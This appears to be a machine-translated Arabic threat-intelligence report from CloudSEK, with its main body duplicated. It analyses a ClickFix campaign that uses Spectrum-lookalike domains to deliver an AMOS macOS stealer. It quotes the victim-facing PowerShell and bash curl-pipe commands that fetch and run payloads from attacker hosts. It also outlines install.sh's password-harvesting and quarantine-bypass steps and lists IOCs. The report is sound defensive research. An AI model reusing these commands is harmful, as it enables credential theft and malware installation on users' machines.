🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي

تم توزيع متغير AMOS عبر Clickfix في حملة تسليم ديناميكية تحت عنوان Spectrum بواسطة قراصنة يتحدثون الروسية

كشف باحثو CloudSek عن حملة معقدة تستفيد من نطاقات «Spectrum» المطبعية لنشر متغير Atomic macOS Stealer (AMOS) الجديد. يستخدم الهجوم، متنكرًا في صورة التحقق من CAPTCHA، حمولات ديناميكية مصممة خصيصًا لنظام تشغيل الضحية - لسرقة كلمات المرور وتجاوز أمان macOS وتنفيذ البرامج الضارة. ومن خلال التعليقات باللغة الروسية الموجودة في الكود ومنطق التسليم المعيب، تعكس الحملة كلاً من الطموحات المتزايدة عبر المنصات والتنفيذ المتسرع. تعمق في كيفية عمل هذا التهديد متعدد المنصات - ولماذا يجب أن تظل مؤسستك في حالة تأهب.

كوشيك بالم
June 4, 2025
Green Alert
Last Update posted on
August 21, 2025
المراقبة الاستباقية للويب المظلم لمؤسستك.

يمكنك مراقبة مؤسستك والدفاع عنها بشكل استباقي ضد التهديدات من الويب المظلم باستخدام CloudSek xviGil.

Schedule a Demo
Table of Contents
Author(s)
No items found.

ملخص تنفيذي

تم الكشف عن حملة جديدة لنسخة Atomic macOS Stealer (AMOS)، للاستفادة من النطاقات المطبعية التي تحاكي Spectrum، وهي شركة اتصالات مقرها الولايات المتحدة. تستخدم الحملة طريقة Clickfix وتقدم حمولات مختلفة بناءً على نظام تشغيل الضحية. والجدير بالذكر أن مستخدمي macOS يحصلون على برنامج نصي ضار مصمم لسرقة كلمات مرور النظام وتنزيل متغير AMOS لمزيد من الاستغلال. يستخدم البرنامج النصي أوامر macOS الأصلية لجمع بيانات الاعتماد وتجاوز آليات الأمان وتنفيذ الثنائيات الضارة. تشير التعليقات باللغة الروسية في شفرة المصدر إلى تورط مجرمي الإنترنت الناطقين بالروسية. يشير المنطق الذي يتم تنفيذه بشكل سيئ في مواقع التسليم، مثل التعليمات غير المتطابقة عبر المنصات، إلى بنية تحتية تم تجميعها على عجل. تسلط هذه الحملة الضوء على الاتجاه المتزايد في هجمات الهندسة الاجتماعية متعددة المنصات التي تستهدف المستخدمين من المستهلكين والشركات.

التحليل

خلال دورة اكتشاف وإسناد البنية التحتية الروتينية للمهاجمين، اكتشفنا عددًا من مواقع التسليم التي تحمل عنوان Clickfix والتي وُجد أنها تقوم بطباعة Spectrum، وهي شركة مقرها الولايات المتحدة تقدم خدمات للتلفزيون الكبلي، والوصول إلى الإنترنت، وأمن الإنترنت، والخدمات المُدارة، والهاتف المحمول، والاتصالات الموحدة.

عندما تنقر الضحية على «التحقق البديل»، يتم نسخ الأمر إلى الحافظة، ويتم عرض التعليمات للضحية لاتباعها. تمامًا مثل أي حملة Clickfix أخرى.

ومع ذلك، بعد إجراء مزيد من التحقيق، اكتشفنا أن موقع الويب قدم ردودًا مختلفة بناءً على وكلاء مستخدمين مختلفين.

الحافظة - وكيل مستخدم غير macOS

بوويرشيل - لا يوجد ملف شخصي - تجاوز سياسة التنفيذ - الأمر «$file = [System.IO.path] ::الجمع ($env: Temp، 'api.ps1')؛ استدعاء - طلب الويب - عنوان URL 'https://cf-verifi[.]pages[.]dev/i.txt' - ملف الخروج $file؛ & $file» # Cloudflare

هذه إحدى طرق التسليم الأكثر استخدامًا لمستخدمي Windows.

الحافظة - وكيل مستخدم macOS

/bin/bash -c «$ (curl -fSSL https://applemacios[.]com/getrur/install.sh)» # التحقق من نظام التشغيل macOS #248187 المصادق عليه بواسطة Cloudflare. حقوق النشر محفوظة لشركة كلاود فلير 2025.

/بين/باش -c» ... «: هذا يخبر النظام بـ قم بتشغيل الأمر داخل علامات الاقتباس باستخدام قذيفة باش.

<URL>كيرل -FSSL:

  • -f: فشل بصمت عند حدوث أخطاء HTTP.
  • -s: الوضع الصامت (لا يوجد مخرج للتقدم).
  • -S: أظهر الخطأ إذا تم استخدام -s وفشل الطلب.
  • -L: اتبع عمليات إعادة التوجيه.
  • يقوم بتنزيل محتويات البرنامج النصي المستضاف على https://applemacios[.]com/getrur/install.sh.

ناتج curl (أي البرنامج النصي install.sh) هو تم تنفيذه على الفور بواسطة Bash.

محتويات ملف install.sh

حصاد كلمات المرور:

  1. يحصل على المستخدم الحالي: اسم المستخدم = $ (whoami)
  2. حلقة موجه كلمة المرور: يطالب باستمرار بـ «كلمة مرور النظام:» حتى يتم إدخال كلمة المرور الصحيحة
  3. التحقق من كلمة المرور: يستخدم القرص. -authonly للتحقق من كلمة المرور مقابل خدمات دليل macOS
  4. تخزين كلمة المرور: يحفظ كلمة المرور الصالحة إلى ملف /tmp/.pass

التنزيل والتنفيذ:

  1. حمولة التنزيلات: curl -o/tmp/تحديث https://applemacios[.]com/getrur/update
  2. يزيل الحجر الصحي: يستخدم كلمة مرور مسروقة مع sudo -S xattr -c لتجاوز أمان macOS
  3. يجعلها قابلة للتنفيذ: chmod +x/tmp/التحديث
  4. ينفذ البرامج الضارة: يقوم بتشغيل الملف الذي تم تنزيله /tmp/update

عند تحليل الملف المحفوظ كـ «تحديث» ضمن دليل «tmp»، اكتشفنا أن البرامج الضارة تنتمي إلى عائلة Atomic macOS Stealer (AMOS). شوهدت متغيرات AMOS مثل Poseidon و Odyssey في البرية مؤخرًا، واكتسبت زخمًا بين مجرمي الإنترنت.

أحدث طريقة توصيل

بعد كشف CloudSek عن تكتيكاتها وشبكتها، تحول المتسللون إلى طريقة توزيع جديدة: إعلانات ضارة لمستودعات GitHub المزيفة التي تستهدف المطورين الذين يستخدمون HomeBrew. (h/t جيروم سيجورا - Malwarebytes)

يعكس تسلسل الهجوم المرصود الحالة التي تم التحقيق فيها سابقًا، والتي تتضمن نصًا خادعًا («install [.] sh») يجلب حمولة «تحديث»، وهي نوع من AMOS. تتكشف عملية العدوى على النحو التالي:

  • تقوم الإعلانات غير الصحية/Clickfix بإعادة توجيه المستخدمين إلى المحطة الطرفية الخاصة بهم.
  • عند تنفيذ البرنامج النصي «install [.] sh»، فإنه يجمع تفاصيل المستخدم، ويطلب كلمات المرور ويتحقق منها، ثم يحفظها.
  • بعد ذلك، يقوم باسترداد حمولة متغير AMOS وتكوينه للإطلاق التلقائي عبر bash.
  • يتم تنفيذ حمولة متغير AMOS تلقائيًا بعد التثبيت [.] sh.

في 6 يونيو 2025، أنشأ ممثل التهديد مستودع «Homebrew» المزيف.

تم تنفيذ هذه الالتزامات ببساطة لاستبدال خوادم الأوامر والتحكم القديمة بخوادم جديدة.

كما نرى أعلاه، قام ممثل التهديد بإزالة C2 الحالي وإضافة مسار تثبيت Homebrew الشرعي (raw github)، والذي من المرجح أن يثبت صحة الإعلانات الخاطئة.

في وقت لاحق، تم استبدال عنوان URL الشرعي بـ C2s التي يتحكم فيها المهاجم. تمت إضافة جميع IOCs من المستودع إلى الجدول في نهاية هذا التقرير.

الإسناد

أثناء فحص الكود المصدري لصفحة التسليم، صادفنا بعض التعليقات باللغة الروسية، مما يشير إلى أنه من المحتمل أن يتم نشر البرامج الضارة عن طريق مجرمو الإنترنت الناطقون بالروسية. باستخدام هذه التعليقات كنقطة محورية، إلى جانب معلمات HTTP الأخرى، تمكنا من العثور على IOFAs بالإضافة إلى IOCs.

تحتوي صفحات التسليم المعنية لحملة AMOS المتغيرة هذه على أخطاء في كل من البرمجة ومنطق الواجهة الأمامية. بالنسبة لوكلاء مستخدمي Linux، تم نسخ أمر PowerShell. علاوة على ذلك، تم عرض التعليمات «اضغط مع الاستمرار على مفتاح Windows+ R» لكل من مستخدمي Windows و Mac.

التكتيكات والتقنيات والإجراءات

ICOs وIOFAs

Indicator Type Value Use
Domain panel-spectrum[.]net Clickfix Delivery
Domain spectrum-ticket[.]net Clickfix Delivery
Domain cf-verifi.pages[.]dev Command and Control
Domain applemacios[.]com Command and Control
MD5 Hash eaedee8fc9fe336bcde021bf243e332a AMOS Variant
URL https://cf-verifi.pages[.]dev/i.txt Contacted URLs
URL https://applemacios[.]com/getrur/install.sh Contacted URLs
URL https://applemacios[.]com/getrur/update Contacted URLs
Domain rugme[.]cat Clickfix Indicator of future attack
Domain homebrewrp[.]com Command and Control
Domain brewory[.]com Command and Control
MD5 Hash 6fd092d86235d7ae35c557523f493674 AMOS Variant

التأثير

  • تسوية بيانات اعتماد الشركات: من خلال جمع كلمات مرور مستخدمي macOS، يمكن للمهاجمين الوصول إلى أنظمة الشركة وشبكات VPN والموارد الداخلية، مما قد يتيح الحركة الجانبية.
  • تجاوز عناصر التحكم في أمان نقطة النهاية: تستخدم البرامج الضارة أدوات مساعدة مشروعة (dscl، sudo، xattr) لتجاوز آليات أمان macOS، مما يقلل من فرصة الكشف عن طريق حلول مكافحة الفيروسات التقليدية أو EDR.
  • الوصول الأولي لعمليات التدخل الأوسع: قد يتم بيع بيانات الاعتماد المسروقة والوصول المستمر إلى وسطاء الوصول أو استخدامها لهجمات المتابعة مثل برامج الفدية أو سرقة البيانات.

عوامل التخفيف

  • تدريب توعية المستخدم: تثقيف الموظفين والمستخدمين حول أساليب سرقة كلمة المرور، وخاصة تلك التي تتنكر في شكل مطالبات التحقق من النظام.
  • تصلب نقطة النهاية في macOS: فرض حماية تكامل النظام وتقييد تنفيذ البرامج النصية غير الموقعة باستخدام أدوات مثل سياسات Gatekeeper و MDM.
  • البحث عن التهديدات لنشاط AMOS: راقب السجلات ونقاط النهاية بحثًا عن علامات إساءة استخدام موجه كلمة المرور ونشاط sudo غير المعتاد ومؤشرات AMOS المعروفة.

المراجع

Predict Cyber threats against your organization

Related Posts
No items found.

انضم إلى أكثر من 10,000 مشترك

تابع آخر الأخبار حول سلالات البرامج الضارة، وأساليب التصيد الاحتيالي،
مؤشرات التسوية وتسريب البيانات.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

استخبارات الخصم
Table of Content

ملخص تنفيذي

تم الكشف عن حملة جديدة لنسخة Atomic macOS Stealer (AMOS)، للاستفادة من النطاقات المطبعية التي تحاكي Spectrum، وهي شركة اتصالات مقرها الولايات المتحدة. تستخدم الحملة طريقة Clickfix وتقدم حمولات مختلفة بناءً على نظام تشغيل الضحية. والجدير بالذكر أن مستخدمي macOS يحصلون على برنامج نصي ضار مصمم لسرقة كلمات مرور النظام وتنزيل متغير AMOS لمزيد من الاستغلال. يستخدم البرنامج النصي أوامر macOS الأصلية لجمع بيانات الاعتماد وتجاوز آليات الأمان وتنفيذ الثنائيات الضارة. تشير التعليقات باللغة الروسية في شفرة المصدر إلى تورط مجرمي الإنترنت الناطقين بالروسية. يشير المنطق الذي يتم تنفيذه بشكل سيئ في مواقع التسليم، مثل التعليمات غير المتطابقة عبر المنصات، إلى بنية تحتية تم تجميعها على عجل. تسلط هذه الحملة الضوء على الاتجاه المتزايد في هجمات الهندسة الاجتماعية متعددة المنصات التي تستهدف المستخدمين من المستهلكين والشركات.

التحليل

خلال دورة اكتشاف وإسناد البنية التحتية الروتينية للمهاجمين، اكتشفنا عددًا من مواقع التسليم التي تحمل عنوان Clickfix والتي وُجد أنها تقوم بطباعة Spectrum، وهي شركة مقرها الولايات المتحدة تقدم خدمات للتلفزيون الكبلي، والوصول إلى الإنترنت، وأمن الإنترنت، والخدمات المُدارة، والهاتف المحمول، والاتصالات الموحدة.

عندما تنقر الضحية على «التحقق البديل»، يتم نسخ الأمر إلى الحافظة، ويتم عرض التعليمات للضحية لاتباعها. تمامًا مثل أي حملة Clickfix أخرى.

ومع ذلك، بعد إجراء مزيد من التحقيق، اكتشفنا أن موقع الويب قدم ردودًا مختلفة بناءً على وكلاء مستخدمين مختلفين.

الحافظة - وكيل مستخدم غير macOS

بوويرشيل - لا يوجد ملف شخصي - تجاوز سياسة التنفيذ - الأمر «$file = [System.IO.path] ::الجمع ($env: Temp، 'api.ps1')؛ استدعاء - طلب الويب - عنوان URL 'https://cf-verifi[.]pages[.]dev/i.txt' - ملف الخروج $file؛ & $file» # Cloudflare

هذه إحدى طرق التسليم الأكثر استخدامًا لمستخدمي Windows.

الحافظة - وكيل مستخدم macOS

/bin/bash -c «$ (curl -fSSL https://applemacios[.]com/getrur/install.sh)» # التحقق من نظام التشغيل macOS #248187 المصادق عليه بواسطة Cloudflare. حقوق النشر محفوظة لشركة كلاود فلير 2025.

/بين/باش -c» ... «: هذا يخبر النظام بـ قم بتشغيل الأمر داخل علامات الاقتباس باستخدام قذيفة باش.

<URL>كيرل -FSSL:

  • -f: فشل بصمت عند حدوث أخطاء HTTP.
  • -s: الوضع الصامت (لا يوجد مخرج للتقدم).
  • -S: أظهر الخطأ إذا تم استخدام -s وفشل الطلب.
  • -L: اتبع عمليات إعادة التوجيه.
  • يقوم بتنزيل محتويات البرنامج النصي المستضاف على https://applemacios[.]com/getrur/install.sh.

ناتج curl (أي البرنامج النصي install.sh) هو تم تنفيذه على الفور بواسطة Bash.

محتويات ملف install.sh

حصاد كلمات المرور:

  1. يحصل على المستخدم الحالي: اسم المستخدم = $ (whoami)
  2. حلقة موجه كلمة المرور: يطالب باستمرار بـ «كلمة مرور النظام:» حتى يتم إدخال كلمة المرور الصحيحة
  3. التحقق من كلمة المرور: يستخدم القرص. -authonly للتحقق من كلمة المرور مقابل خدمات دليل macOS
  4. تخزين كلمة المرور: يحفظ كلمة المرور الصالحة إلى ملف /tmp/.pass

التنزيل والتنفيذ:

  1. حمولة التنزيلات: curl -o/tmp/تحديث https://applemacios[.]com/getrur/update
  2. يزيل الحجر الصحي: يستخدم كلمة مرور مسروقة مع sudo -S xattr -c لتجاوز أمان macOS
  3. يجعلها قابلة للتنفيذ: chmod +x/tmp/التحديث
  4. ينفذ البرامج الضارة: يقوم بتشغيل الملف الذي تم تنزيله /tmp/update

عند تحليل الملف المحفوظ كـ «تحديث» ضمن دليل «tmp»، اكتشفنا أن البرامج الضارة تنتمي إلى عائلة Atomic macOS Stealer (AMOS). شوهدت متغيرات AMOS مثل Poseidon و Odyssey في البرية مؤخرًا، واكتسبت زخمًا بين مجرمي الإنترنت.

أحدث طريقة توصيل

بعد كشف CloudSek عن تكتيكاتها وشبكتها، تحول المتسللون إلى طريقة توزيع جديدة: إعلانات ضارة لمستودعات GitHub المزيفة التي تستهدف المطورين الذين يستخدمون HomeBrew. (h/t جيروم سيجورا - Malwarebytes)

يعكس تسلسل الهجوم المرصود الحالة التي تم التحقيق فيها سابقًا، والتي تتضمن نصًا خادعًا («install [.] sh») يجلب حمولة «تحديث»، وهي نوع من AMOS. تتكشف عملية العدوى على النحو التالي:

  • تقوم الإعلانات غير الصحية/Clickfix بإعادة توجيه المستخدمين إلى المحطة الطرفية الخاصة بهم.
  • عند تنفيذ البرنامج النصي «install [.] sh»، فإنه يجمع تفاصيل المستخدم، ويطلب كلمات المرور ويتحقق منها، ثم يحفظها.
  • بعد ذلك، يقوم باسترداد حمولة متغير AMOS وتكوينه للإطلاق التلقائي عبر bash.
  • يتم تنفيذ حمولة متغير AMOS تلقائيًا بعد التثبيت [.] sh.

في 6 يونيو 2025، أنشأ ممثل التهديد مستودع «Homebrew» المزيف.

تم تنفيذ هذه الالتزامات ببساطة لاستبدال خوادم الأوامر والتحكم القديمة بخوادم جديدة.

كما نرى أعلاه، قام ممثل التهديد بإزالة C2 الحالي وإضافة مسار تثبيت Homebrew الشرعي (raw github)، والذي من المرجح أن يثبت صحة الإعلانات الخاطئة.

في وقت لاحق، تم استبدال عنوان URL الشرعي بـ C2s التي يتحكم فيها المهاجم. تمت إضافة جميع IOCs من المستودع إلى الجدول في نهاية هذا التقرير.

الإسناد

أثناء فحص الكود المصدري لصفحة التسليم، صادفنا بعض التعليقات باللغة الروسية، مما يشير إلى أنه من المحتمل أن يتم نشر البرامج الضارة عن طريق مجرمو الإنترنت الناطقون بالروسية. باستخدام هذه التعليقات كنقطة محورية، إلى جانب معلمات HTTP الأخرى، تمكنا من العثور على IOFAs بالإضافة إلى IOCs.

تحتوي صفحات التسليم المعنية لحملة AMOS المتغيرة هذه على أخطاء في كل من البرمجة ومنطق الواجهة الأمامية. بالنسبة لوكلاء مستخدمي Linux، تم نسخ أمر PowerShell. علاوة على ذلك، تم عرض التعليمات «اضغط مع الاستمرار على مفتاح Windows+ R» لكل من مستخدمي Windows و Mac.

التكتيكات والتقنيات والإجراءات

ICOs وIOFAs

Indicator Type Value Use
Domain panel-spectrum[.]net Clickfix Delivery
Domain spectrum-ticket[.]net Clickfix Delivery
Domain cf-verifi.pages[.]dev Command and Control
Domain applemacios[.]com Command and Control
MD5 Hash eaedee8fc9fe336bcde021bf243e332a AMOS Variant
URL https://cf-verifi.pages[.]dev/i.txt Contacted URLs
URL https://applemacios[.]com/getrur/install.sh Contacted URLs
URL https://applemacios[.]com/getrur/update Contacted URLs
Domain rugme[.]cat Clickfix Indicator of future attack
Domain homebrewrp[.]com Command and Control
Domain brewory[.]com Command and Control
MD5 Hash 6fd092d86235d7ae35c557523f493674 AMOS Variant

التأثير

  • تسوية بيانات اعتماد الشركات: من خلال جمع كلمات مرور مستخدمي macOS، يمكن للمهاجمين الوصول إلى أنظمة الشركة وشبكات VPN والموارد الداخلية، مما قد يتيح الحركة الجانبية.
  • تجاوز عناصر التحكم في أمان نقطة النهاية: تستخدم البرامج الضارة أدوات مساعدة مشروعة (dscl، sudo، xattr) لتجاوز آليات أمان macOS، مما يقلل من فرصة الكشف عن طريق حلول مكافحة الفيروسات التقليدية أو EDR.
  • الوصول الأولي لعمليات التدخل الأوسع: قد يتم بيع بيانات الاعتماد المسروقة والوصول المستمر إلى وسطاء الوصول أو استخدامها لهجمات المتابعة مثل برامج الفدية أو سرقة البيانات.

عوامل التخفيف

  • تدريب توعية المستخدم: تثقيف الموظفين والمستخدمين حول أساليب سرقة كلمة المرور، وخاصة تلك التي تتنكر في شكل مطالبات التحقق من النظام.
  • تصلب نقطة النهاية في macOS: فرض حماية تكامل النظام وتقييد تنفيذ البرامج النصية غير الموقعة باستخدام أدوات مثل سياسات Gatekeeper و MDM.
  • البحث عن التهديدات لنشاط AMOS: راقب السجلات ونقاط النهاية بحثًا عن علامات إساءة استخدام موجه كلمة المرور ونشاط sudo غير المعتاد ومؤشرات AMOS المعروفة.

المراجع

كوشيك بالم

Related Blogs